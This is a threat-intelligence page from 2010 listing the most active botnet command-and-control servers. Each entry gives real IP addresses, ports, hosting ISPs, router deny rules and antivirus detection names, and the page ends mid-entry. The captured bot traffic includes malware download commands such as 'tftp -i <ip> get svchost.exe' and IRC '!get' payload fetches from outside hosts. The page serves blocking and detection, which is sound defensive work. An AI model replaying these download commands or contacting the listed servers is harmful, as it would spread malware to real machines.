Download our list of the most observed botnet command and control server IP addresses.
Most Prolific BotNet Command and Control Servers and Filters
Tue Feb 9 08:47:03 2010
10 Day Filter Set 30 Day Filter Set
| Priority 100 |
TCP Ports 80 80
218 80
91 80
88 |
Filter deny ip host 213.219.245.212 any log ! 438 infects 08/13/09 to 02/08/10 eastweb.ru |
ISP hosting and colocation services |
| Clients 438 |
 russian federation |
Activity |
Domain eastweb.ru |
Chatter Example
- Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 87.250.57.232:8138
- Server: GET /index.php?id=txphhhxqqjawgik&scn=0&inf=0&ver=20&cnt=USA...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Korgo.9359.B |
| AntiVir | Korgo.X |
| Authentium | Korgo.W |
| Avast | _Korgo-T |
| AVG | Padobot.W |
| BitDefender | Korgo.W |
| CAT-QuickHeal | Korgo.X |
| ClamAV | Korgo.Y |
| DrWeb | Lsabot |
| eSafe | Padobot.gen |
| eTrust-Vet | Korgo.AB |
| Ewido | Dropper.Paradrop.a |
| FileAdvisor | MISSED |
| Fortinet | Korgo.K!worm |
| F-Prot | Korgo.W |
| F-Secure | Padobot.gen |
| Ikarus | Korgo.K |
| Kaspersky | Padobot.gen |
| McAfee | Korgo.ab |
| Microsoft | Korgo.AB |
| NOD32v2 | Korgo.Y |
| Norman | Korgo.Y |
| Panda | Korgo.AY.worm |
| Prevx1 | KORGO.W |
| Rising | Korgo.x |
| Sophos | Korgo-K |
| Sunbelt | MISSED |
| Symantec | Korgo.X |
| TheHacker | Korgo(2).gen.pack |
| TrendMicro | MISSED |
| VBA32 | Padobot.gen |
| VirusBuster | Korgo.AB |
Webwasher
Gateway | Korgo.X |
| |
|
| Priority 100 |
TCP Ports 2081 9890 9890
66 |
Filter deny ip host 66.252.13.214 any log ! 204 infects 08/14/09 to 11/03/09 louisianadynamics.com |
ISP gigenet |
| Clients 204 |
 united states |
Activity |
Domain louisianadynamics.com |
Chatter Example
- Client: USER a
- Client: PASS a
- Server: RETR Win15763.exe
- Client: NICK F-olmgmodqUSER F-olmgmodq 0 0 :F-olmgmodq
- Server: :211.cpe.netcabo.uk NOTICE AUTH :*** Looking up your...
- Client: JOIN ##S## J
- Server: :F-olmgmodq!F-olmgmodq@192.168.1.172 JOIN...
- Client: USERHOST F-olmgmodqJOIN ##S## JUSERHOST F-olmgmodqJOIN ##S##...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.variant |
| AntiVir | TRCrypt.TPM.Gen |
| Authentium | Heuristic-210!Eldorado |
| Avast | MISSED |
| AVG | RBot.DN |
| BitDefender | MemScan_Backdoor.RBot.XYL |
| CAT-QuickHeal | Black.a |
| ClamAV | Packed-142 |
| DrWeb | Packed.650 |
| eSafe | MISSED |
| eTrust-Vet | ForBot.WP |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Packed.2D18!tr |
| F-Prot | Heuristic-210!Eldorado |
| F-Secure | Kolab.arp |
| Ikarus | Kolab |
| Kaspersky | Kolab.arp |
| McAfee | MISSED |
| Microsoft | Wootbot.gen |
| NOD32v2 | MISSED |
| Norman | Malware.DQWL |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | Undef.blt |
| Sophos | MalGeneric-A |
| Sunbelt | Kolab.arp |
| Symantec | Spybot.Worm |
| TheHacker | Behav-Heuristic-064 |
| TrendMicro | BKDR_SDBOT.FOG |
| VBA32 | Wootbot |
| VirusBuster | Agobot.WPUZ |
Webwasher
Gateway | MISSED |
| |
|
| Priority 100 |
TCP Ports 65520 65520
68 65520
193 65520
218 |
Filter deny ip host 88.198.228.238 any log ! 123 infects 12/04/09 to 02/03/10 your-server.de |
ISP hetzner |
| Clients 123 |
 germany |
Activity |
Domain your-server.de |
Chatter Example
- Server: PONG :i.
- Client: JOIN &virtu
- Server: NICK yaapulwgUSER k020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG yaapulwg :!get...
- Client: GET /inst.php?id=32&sid=0 HTTP/1.0User-Agent: DownloadHost:...
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRFraudPack.aefn |
| Authentium | MISSED |
| Avast | _Malware-gen |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | FraudPack.aefn |
| ClamAV | MISSED |
| DrWeb | Fakealert.8143 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | FraudPack.AEFN!tr |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | FakeAV |
| Kaspersky | FraudPack.aefn |
| McAfee | Suspect-1B!357486DAE775 |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjZlob.KH |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalEncPk-KH |
| Sunbelt | Generic!BT |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | DR.Agent.RFTA |
Webwasher
Gateway | MISSED |
| |
|
| Priority 97 |
TCP Ports 3305 |
Filter deny ip host 92.240.234.164 any log ! 94 infects 09/07/09 to 02/08/10 lightstorm.sk |
ISP lightstorm communications s.r.o |
| Clients 94 |
 slovakia |
Activity |
Domain lightstorm.sk |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 211.20.222.150 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 211.20.222.150 get dllhost.exe wins\\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|mzlofyw7bUSER hpgbpr6lj * 0 :USA|2K|669
- Server: :hub.2702.net 001 P|mzlofyw7b...
- Client: USERHOST P|mzlofyw7b
- Server: :hub.2702.net 302 P|mzlofyw7b...
- Client: USERHOST P|mzlofyw7bMODE P|mzlofyw7b JOIN #mm RSA
- Client: PRIVMSG #mm...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.Gen |
| AntiVir | TRATRAPS.Gen |
| Authentium | MISSED |
| Avast | _DCom-F |
| AVG | SHeur2.AOLW |
| BitDefender | Generic.Mydoom.F72197F1 |
| CAT-QuickHeal | Agent.gen |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot.origin |
| eSafe | MISSED |
| eTrust-Vet | IRCBot.PJ |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Kolabc.gza |
| Ikarus | Exploit.MS06040 |
| Kaspersky | Kolabc.gza |
| McAfee | Spybot.worm!l |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | Atraps.MQB |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalBehav-004 |
| Sunbelt | MISSED |
| Symantec | Spybot.Worm |
| TheHacker | MISSED |
| TrendMicro | SPYBOT.BIM |
| VBA32 | MISSED |
| VirusBuster | RBot.Gen.3 |
Webwasher
Gateway | MISSED |
| |
|
| Priority 90 |
TCP Ports 65520 65520
91 65520
213 |
Filter deny ip host 218.93.205.30 any log ! 87 infects 09/09/09 to 12/19/09 163data.com.cn |
ISP chinanet jiangsu province network |
| Clients 87 |
 china |
Activity |
Domain 163data.com.cn |
Chatter Example
- Server: GET /include/lib.js HTTP/1.0Accept: */*Referer:...
- Server: GET /dspa/hcimages/nonadult/generic_search/main.jpg...
- Client: NICK xmpunysoUSER a020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG xmpunyso :!get http:/pozemle.cn/in/so.txt:u. PRIVMSG...
- Server: GET /in/so.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
- Server: GET /hc3.asp HTTP/1.1Accept: */*Accept-Language:...
- Server: GET /include/lib.js HTTP/1.1Accept: */*Referer:...
- Server: GET /hb.asp HTTP/1.1Accept: */*Referer:...
- Server: GET...
- Server: GET /onexit.asp HTTP/1.1Accept: */*Referer:...
- Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET...
- Server: GET /blank.htm HTTP/1.1Accept: */*Referer:...
- Server: GET /hb.asp HTTP/1.1Accept: */*Referer:...
- Server: GET /onexit.asp HTTP/1.1Accept: */*Referer:...
- Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
- Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /?param1={KeyWord:Oakland%20Material%20Handling}...
- Server: + 1) == (name + \\'=\\')) { cookieValue =...
- Server: PONG :i.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | Momibot |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | Momibot.gen!B |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | Generic.51F24BA7 |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 59 |
TCP Ports 65520 65520
88 65520
218 |
Filter deny ip host 193.104.94.11 any log ! 57 infects 11/05/09 to 01/31/10 ipaper.com |
ISP block for pi assignments |
| Clients 57 |
 united kingdom |
Activity |
Domain ipaper.com |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 110.14.214.164 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 110.14.214.164 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK muyzvqvrUSER w020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG muyzvqvr :!get...
- Client: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /erku.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /p1023/2.0/d.bin?pw1022161323 HTTP/1.0Accept: */*User-Agent:...
- Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: PONG :k.
- Client: JOIN &virtu
- Server: GET /files/logo.gif HTTP/1.0Accept: */*Referer:...
- Server: GET /us/portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: GET /us/portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRClick.VB.dic |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | Trojan-Clicker.VB.dic |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 48 |
TCP Ports 65520 65520
218 |
Filter deny ip host 91.212.220.75 any log ! 47 infects 09/11/09 to 10/30/09 - |
ISP group vertical ltd |
| Clients 47 |
russian federation |
Activity |
Domain - |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 116.126.26.100 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 116.126.26.100 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK xdsexzfyUSER k020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :k. PRIVMSG xdsexzfy :!get http:/gidromash.cn/oc/box.txt
- Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
- Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | DownLoad.47549 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 35 |
TCP Ports 65520 65520
83 |
Filter deny ip host 218.93.201.51 any log ! 34 infects 12/26/09 to 02/08/10 163data.com.cn |
ISP chinanet jiangsu province network |
| Clients 34 |
china |
Activity |
Domain 163data.com.cn |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 110.12.207.146 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 110.12.207.146 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK qnqaacxfUSER t020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG qnqaacxf :!get...
- Client: GET /inst.php?id=32&sid=0 HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /erku.txt?t=0.6612011 HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
- Server: GET /sv/pm.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /winrar.exe?t=0.5138667 HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /w.txt?t=0.5894679 HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /banner.exe?t=0.774838 HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET / HTTP/1.0Accept: */*Accept-Language: en-usReferer:...
- Server: PONG :i.
- Client: JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRCrypt.ULPM.Gen |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | VirTool.DelfInject.gen!X.4 |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | Sopiclick |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | Sopiclick.A |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalGeneric-A |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | SScope.Trojan-Downloader.072 |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 26 |
TCP Ports 16667 |
Filter deny ip host 66.252.13.212 any log ! 26 infects 08/23/09 to 11/13/09 louisianadynamics.com |
ISP gigenet |
| Clients 26 |
united states |
Activity |
Domain louisianadynamics.com |
Chatter Example
- Client: USER 1
- Server: 331 Password required
- Client: PASS 1
- Server: 230 User logged in.
- Server: RETR Tracker.exe
- Server: 150 Opening BINARY mode data connection
- Server: 221 Goodbye happy r00ting.
- Client: NICK [USA]2K-SP2[00]8493USER ygaci 0 0...
- Server: NICK [USA]2K-SP2[00]6761USER jutcf 0 0...
- Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your...
- Client: USERHOST [USA]2K-SP2[00]6761
- Client: MODE [USA]2K-SP2[00]6761 -x+iJOIN #l# lamUSERHOST...
- Server: PONG :mi67.three.co.lt
- Client: JOIN #l# lam
- Server: PONG :mi67.three.co.lt
- Client: JOIN #l# lam
- Server: NICK [USA]2K-SP2[00]0046USER etbtll 0 0...
- Server: :mi67.three.co.lt NOTICE AUTH :*** Looking up your hostname...
- Server: :mi67.three.co.lt NOTICE AUTH :*** Couldn\\'t resolve your...
- Server: PONG :mi67.three.co.ltJOIN #l# lam
- Client: USERHOST [USA]2K-SP2[00]0046
- Client: MODE [USA]2K-SP2[00]0046 -x+iJOIN #l# lamUSERHOST...
- Server: PONG :mi67.three.co.ltJOIN #l# lam
- Server: PONG :mi67.three.co.ltJOIN #l# lam
- Server: PONG :mi67.three.co.ltJOIN #l# lam
- Server: PONG :mi67.three.co.ltJOIN #l# lam
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.B |
| AntiVir | Virut.AX |
| Authentium | Backdoor2.DKQM |
| Avast | _Virtob |
| AVG | Virut |
| BitDefender | Generic.127971 |
| CAT-QuickHeal | Virut.Z |
| ClamAV | Virut-54 |
| DrWeb | HLLW.MyBot |
| eSafe | MISSED |
| eTrust-Vet | Virut.7115 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.AV |
| F-Prot | Backdoor2.DKQM |
| F-Secure | Virut.av |
| Ikarus | VirTool.DelfInject |
| Kaspersky | Virut.av |
| McAfee | Virut.gen.a |
| Microsoft | Virut.AC |
| NOD32v2 | MISSED |
| Norman | Agent.LSMS |
| Panda | Virutas.FG |
| Prevx1 | MISSED |
| Rising | Mnless.akf |
| Sophos | Virut-W |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.av |
| TrendMicro | PE_VIRUT.AV |
| VBA32 | Virut.2 |
| VirusBuster | Virut.Gen.4 |
Webwasher
Gateway | MISSED |
| |
|
| Priority 23 |
TCP Ports 4545 8585 |
Filter deny ip host 69.42.218.70 any log ! 23 infects 12/01/09 to 12/10/09 likeacyb.org |
ISP awknet communications llc |
| Clients 23 |
united states |
Activity |
Domain likeacyb.org |
Chatter Example
- Client: USER mmsnbl mmsnbl mmsnbl :zrgsgbcjtqojqmvg
- Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
- Client: NICK gLMYNsE
- Server: :irc.priv8net.com NOTICE AUTH :*** Couldn\\'t resolve your...
- Client: MODE gLMYNsE +xi
- Client: JOIN ##nerds## USERHOST gLMYNsE
- Server: :gLMYNsE!mmsnbl@28B83DC7.401D014A.D1CD3454.IP JOIN...
- Client: MODE ##NERDS## +smntu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 22 |
TCP Ports 7000 |
Filter deny ip host 87.118.98.185 any log ! 22 infects 09/01/09 to 09/04/09 keymachine.de |
ISP keyweb ag ip network |
| Clients 22 |
germany |
Activity |
Domain keymachine.de |
Chatter Example
- Client: USER 1
- Server: 331 Password required
- Client: PASS 1
- Server: 230 User logged in.
- Server: RETR coder.exe
- Server: 150 Opening BINARY mode data connection
- Server: 221 Goodbye happy r00ting.
- Client: NICK USA|00|XP|SP0|0204612USER wxvkwzjqc 0 0...
- Server: :irc.oc256.com NOTICE AUTH :*** Looking up your...
- Server: :irc.oc256.com NOTICE USA|00|XP|SP0|0204612 :*** If you are...
- Server: PONG :DD5EF013
- Client: JOIN ##nzm##
- Client: USERHOST USA|00|XP|SP0|0204612MODE USA|00|XP|SP0|0204612 -x+iJOIN...
- Client: PRIVMSG ##nzm## :\\002n\\002z\\037m\\037 (root.p\\037l\\037g)...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Win-Agent.20480.AJY |
| AntiVir | TRDropper.Gen |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | Dropper.Generic.AVFT |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | Poison.767 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | Trojan-Ransom |
| Kaspersky | Trojan-Ransom.SMSer.in |
| McAfee | MISSED |
| Microsoft | VirTool_Injector.gen!Y |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | Rbot.afvq |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 17 |
TCP Ports 6900 |
Filter deny ip host 78.155.216.238 any log ! 17 infects 09/29/09 to 09/30/09 - |
ISP mostelecom-customer |
| Clients 17 |
russian federation |
Activity |
Domain - |
Chatter Example
- Client: USER 1
- Server: 331 Password required
- Client: PASS 1
- Server: 230 User logged in.
- Server: RETR utilmgr.exe
- Server: 150 Opening BINARY mode data connection
- Server: 221 Goodbye happy r00ting.
- Client: NICK Gleason211USER xaqrn 0 0 :Gleason211
- Server: :fart.bitchassness.shit NOTICE Gleason211 :*** If you are having...
- Server: PONG :4FE4D7D7
- Client: JOIN ##!X4
- Client: USERHOST Gleason211MODE Gleason211 -x+iJOIN ##!X4 USERHOST...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | IRCBackDoor.SdBot4.NNI |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Kolab.eay |
| Ikarus | Kolab |
| Kaspersky | Kolab.eay |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalGeneric-A |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | KOLAB.DW |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 12 |
TCP Ports 6556 6556
194 |
Filter deny ip host 194.109.11.65 any log ! 12 infects 09/06/09 to 12/23/09 xs4all.net |
ISP xs4all ppp _30 router subnets |
| Clients 12 |
 netherlands |
Activity |
Domain xs4all.net |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 74.214.47.11 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 74.214.47.11 get dllhost.exe wins\\DLLHOST.EXE
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
- Client: JOIN #9# g3t0u7
- Client: MODE tein +i
- Server: :tein!tein@192.168.1.191 JOIN :#9# g3t0u7
- Server: :mindleak.com MODE #9# g3t0u7 +nt:mindleak.com 353 tein = #9#...
- Client: JOIN #9# g3t0u7
- Server: :tein!tein@192.168.1.191 JOIN :#9# g3t0u7
- Server: :mindleak.com MODE #9# g3t0u7 +nt:mindleak.com 353 tein = #9#...
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Client: USER tein tein tein :dETOX/0x91 (win32)NICK tein
- Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.20959 |
| AntiVir | Codbot.BG |
| Authentium | Sdbot.LHJ |
| Avast | _CodBot-P |
| AVG | Generic.GFM |
| BitDefender | Codbot.AG |
| CAT-QuickHeal | MISSED |
| ClamAV | Stration.QR-1 |
| DrWeb | IRC.Moto |
| eSafe | Stration |
| eTrust-Vet | Toxbot.AO |
| Ewido | Codbot.ag |
| FileAdvisor | MISSED |
| Fortinet | SpyBot.ZI!dam |
| F-Prot | Sdbot.LHJ |
| F-Secure | Codbot.bn |
| Ikarus | Codbot.bn |
| Kaspersky | Codbot.bn |
| McAfee | Proxy-FBSR |
| Microsoft | Codbot |
| NOD32v2 | Codbot |
| Norman | Codbot.BG |
| Panda | Codbot.BC.worm |
| Prevx1 | MISSED |
| Rising | Codbot.l |
| Sophos | MalIRCBot-B |
| Sunbelt | MISSED |
| Symantec | Toxbot |
| TheHacker | BackdoorCodbot.ag |
| TrendMicro | TROJ_PROXY.DK |
| VBA32 | Codbot.ag |
| VirusBuster | Codbot.W |
Webwasher
Gateway | Codbot.20959 |
| |
|
| Priority 10 |
TCP Ports 65520 65520
91 |
Filter deny ip host 91.121.221.157 any log ! 10 infects 08/22/09 to 09/05/09 - |
ISP fr-ovh |
| Clients 10 |
 france |
Activity |
Domain - |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 114.203.72.50 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 114.203.72.50 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK lejfnledUSER e020500 . . :_
- Client: Service Pack 2JOIN &virtu
- Server: :l. PRIVMSG lejfnled :!get http:/gidromash.cn/oc/box.txt
- Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
- Server: GET /lib/mr.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | Hostil |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | Hostil.F |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalEncPk-IF |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 10 |
TCP Ports 3305 |
